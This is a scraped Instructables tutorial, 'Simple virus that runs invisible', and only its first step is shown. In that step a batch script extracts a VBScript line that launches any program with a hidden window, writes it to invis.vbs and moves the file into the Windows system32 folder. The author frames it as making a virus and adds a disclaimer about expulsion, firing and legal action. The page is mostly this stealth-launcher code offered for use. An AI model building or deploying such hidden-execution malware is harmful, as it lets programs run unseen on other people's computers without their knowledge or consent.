3 Simple Ways to
Share What You Make

With Instructables you can share what you make with the world — and tap into an ever-growing community of creative experts.

PhotosPhotos

Share one or more photos of a project, recipe, or whatever you've made, quickly and easily.

Step by StepStep-By-Step

Share your step-by-step photos with text instructions of what you made so others can do it too!

VideoVideo

Share your how-to video. You'll need your embed code from a video site such as YouTube.

Simple virus that runs invisible

Simple virus that runs invisible
This instructable is to show you how to make a simple virus that will run invisible.

This was posted for educational purposes only, I am not to be held responsible for any inappropriate usage of this information or the files that I may have provided. I am not to be held responsible for individuals or groups of people that suffer consequences of using this information or the files that I provided, these consequences include things such as expulsion, getting fired, or legal action.
 
Remove these adsRemove these ads by Signing Up
 

Step 1Creating the invis script

@echo off

goto process
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

:process
type run.bat | find "CreateObject"| find /v "type" > invis.vbs

searches the .bat file for all lines of text with CreateObject in it and copies them to a vbs file entitled invis.vbs. Also it makes sure not to copy the line that searches for the text.

move invis.vbs %windir%\system32


Moves invis.vbs to the system32 directory
« Previous StepDownload PDFView All StepsNext Step »

Pro

Get More Out of Instructables

Already have an Account?

close

All Steps Viewing
View all steps of an Instructable on the same page when you're a Pro Member.

Upgrade to Pro today!
3
Followers
6
Author:Nemraiku(Sean)